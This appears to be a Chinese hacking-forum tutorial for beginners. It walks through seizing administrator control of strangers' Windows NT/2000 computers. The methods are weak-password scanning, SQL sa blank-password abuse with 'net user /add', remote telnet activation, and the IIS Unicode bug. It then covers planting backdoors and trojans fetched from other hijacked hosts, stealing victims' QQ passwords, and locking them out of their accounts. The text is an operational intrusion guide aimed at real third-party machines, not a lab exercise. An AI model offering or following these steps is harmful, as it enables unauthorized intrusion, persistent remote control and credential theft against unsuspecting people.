看到论坛里有部分会员问的都是一些怎样入侵对方电脑的问题。想了许久,我决定自己提笔写一篇文章,总结我几个月来接触这个领域的一点经验,希望能对跟我一样菜的菜鸟们点帮助。这也是我第一次写文章,有些地方难免会出现错误,如有不明地方可以提出来。
好~~!废话就不多说了,开始步入正题吧!!开始之前先请各位统装98的改装NT以上系统,因为下面用到的一些命令和软件
在98下是行不通的。通常得到管理员权限才能说入侵控制了对方计算机,所以下面的入侵方法都能得到管理员权限。说句题外话,我用的是win2000,所以操作都是在这个系统通过的。
1. 不用说,肯定是IPC弱口令啦,真不明白网上为什么会有那么多这种人见人爱车见车载的计算机,随便一扫都能扫出一大堆。首先,打开流光4.7,记得要打IP补丁啊,不然不能扫国内的主机,这样是很不爽的,要来个通杀嘛,呵呵。点击“探测-高级扫描工具”,出现一个方框,输入一段IP,检测项目中只需在IPC前面打钩。点“确定-开始”就开始探测了。如果你的IP段够好的话,很快就可以在最下面的方框里看到结果。哈哈~~真是多啊,基本上都是空口令。好,现在就开始入侵了,点击“工具-NT/IIS工具-种植者”,填入刚才扫描得到的结果,选一个应用程序文件,我常用的是独孤剑客的winshell(下面提到的都是默认设置),5K大小,是我56K猫的最爱~!你也可以上传灰鸽子,这种木马挺不错的,能自动解析域名上线,还可以避过防火墙。一分钟后,我传上去的winshell运行了,很自然的打开cmd.exe,打上nc IP 5277 提示输入密码,输入设置winshell时的密码(默认为空),回车就进入对方电脑了。这时出现cmd提示符,输入i(安装winshell)再输入s(进入cmd),再再输入“net start winshell”(后台服务,开机自动运行)。完成前面的步骤后,才算是真正进去了。进去干嘛呢?嗯~~这确实是个很高深的问题~~%¥想干什么就给你们去想吧。不过,呵呵,我还是想说几句,推荐找到他的tencent目录,找到他的QQ号码,加他为好友,方便以后长期控制他(肉机啊)。如果他不肯通过你的请求,那就用狠一点的手段,利用流光种植者再上传一个QQ杀手,把他的QQ密码偷到手。得到他的密码之后就~~~~~就用他的QQ登陆,再用自己的私人QQ提交好友请求。爽吧~~~~加多一句废话,如果他还没申请密码保护,那就好心点,帮他申请啦,不过邮箱记得要用自己的啊!!!
2. 3389。请各位注意,我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦,证明你今天时运高,记得要买彩票啊!众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点。如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。打开scanner,输入一段IP,范围要大一点,scanner速度很快的。在“所有端口从”那里都填3389,点击“开始”就可以开工了。跟QQ上的好友聊了几句之后,铛~~~扫描完成,结果出来了。点击右下脚的“删除”把多余的IP删了,只留下开了3389的IP。再点击“保存”,把结果保存到文件夹里。找到保存文件的目录,打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑-替换”在“查找内容”里输入要删除的垃圾,再点“全部替换”就行了。打开xscan,点击左边的蓝色按钮,进入“扫描板块”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩,其他都清除掉。再点击右边的蓝色按钮,进入“扫描参数”,钩上“从文件获取主机列表”,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。这时需要比较长的时间!去论坛灌灌水,跟MM说几句话吧,不要傻等就行了。确定目标,用mstsc(登陆终端的工具)登陆对方主机后,打开对方cmd.exe,输入“net use”,先看看有没有人也在连接这部机(安全一点好,^_^)。“net view”命令之后当出现一堆前面带\\字符的就表示~~就表示什么呢??我想大家都非常明白吧! 这时你就可以在那部计算机里下载并装个像“网络执行官”之类的局域网控制软件。碰到这样的计算机一定要珍惜啊,要充分利用利用。
3.sa空口令。这时又要用到流光了,点击“探测-扫描POP3/FTP/NT/SQL主机”,扫描主机类型设为SQL,把“将FrontPage主机自动加入HTTP列表”去掉。扫描结果出来了之后,用鼠标左键单击某一个结果,点两下“连接”就会出现一个方框,“Type Command at Prompt”提示符是SQLCMD。打入一个命令“net user 要创建的用户名 密码 /add”(这是创建一个用户),再打一个“net localgroup administrators 刚创建的用户名 /add”(把创建的用户加到administrators组)。创建了用户当然是用流光种植者上传后门啦,填入资料,点确定,但却提示上传文件失败,再检查一下IP,用户名,密码,并没有错啊。咚咚~~~告诉你们吧,这是因为对方删除了IPC$,种植者需要IPC连接,你当然上传不了文件啦。这时候就要动用另一种工具,它的特点是:不依赖于目标的ipc$开放与否远程开启/关闭目标telnet服务,这就是“rtcs.vbs”。在cmd输入:“cscript RTCS.vbs 目标IP 用户名 密码 NTLM验证方式 telnet服务端口”,当出现“to get a shelll”时就表示成功了,你就可以“telnet IP 服务端口”了,简单吧!!如果你想上传木马,也很简单,只要登陆ftp服务器(要有你要下载的木马服务端)。这些可以找网上的肉机,弱密码的实在太多了,或用自己部机做服务器也可以,后面我会详细介绍。telnet上对方,输入“ftp ftp服务器IP”用户名密码进入,“get 木马服务端”就下载来了。“bye”退出ftp,输入木马文件名回车就运行了,以后你就可以用木马控制他了。
4.U漏洞。这种漏洞现在虽然很少,但还是可以比较轻松的扫描到,用这种方法黑网站确实很轻松。但我们这次说的并不是如何黑网站,而是如何取得管理员权限。首先,启动流光,选择“探测--扫描POP3/FTP/NT/SQL主机”,“扫描主机类型”为NT/98。等一段时间(看你扫描IP多少来看)扫描完成后。如果你能在中间的方框里看到黑色的小电脑,就说明你已经得到了存在U漏洞的主机了。双击iiscrk(小金的作品),在“当前连接”处添上刚才扫描得到的主机,其他设置一般默认行了,不行,换其他方式试试。点击左边第一个图标连接IIS主机,如果成功,你就会在最下边的方框看到对方主机目录。要当心啊,具有删读的权限,不要乱破坏(警告)。好,现在开始真正工作了。单击左数第六个图标“tftp”,如何做我就不多说了,里面说得明明白白。不过,要上传什么文件我还是要说的,这个就是iiscrk自带的idq.dll,把它上传到cripts目录,成功后。在cmd输入“ispc 对方IP/scripts/idq.dll ”(ISPC每次执行一个命令要打3次回车)。成功登陆到对方后,你就有了system权限。用我上面提到的方法创建用户并加他到administrators组。我要补充的是,一般你连接上去时出现的目录都是可执行目录,文件可放在里面。
本来我打算写多几种方法的,但没有什么时间,现在我连打开电脑的时间都受到了限制(痛苦ing)。因为这次期中考考得实在是#¥#!!唉~~~,有一科还是老师好心,送我几分我才及格(太惭愧了)。看来要以后啦。。
上面提到的软件如果本站没有下载,请www.google.com搜索。
推荐几个不错的东东,适合菜鸟(我也经常用):
DameWare Mini Remote Control(远程桌面控制)
Loader(我主要是用它来改QQ端口,因为我经常用代理啊)
BlackICE PC Protection(防火墙)
MsgSend(发信息用)
QQ代理(不用我说,你们肯定知道是干嘛的)
ttyip(隐藏自己在论坛、留言本、计数器、WEB聊天室、网页的真实IP)
BY 客家黑客联盟 冷刺
广结天下黑客
共筑网络长城
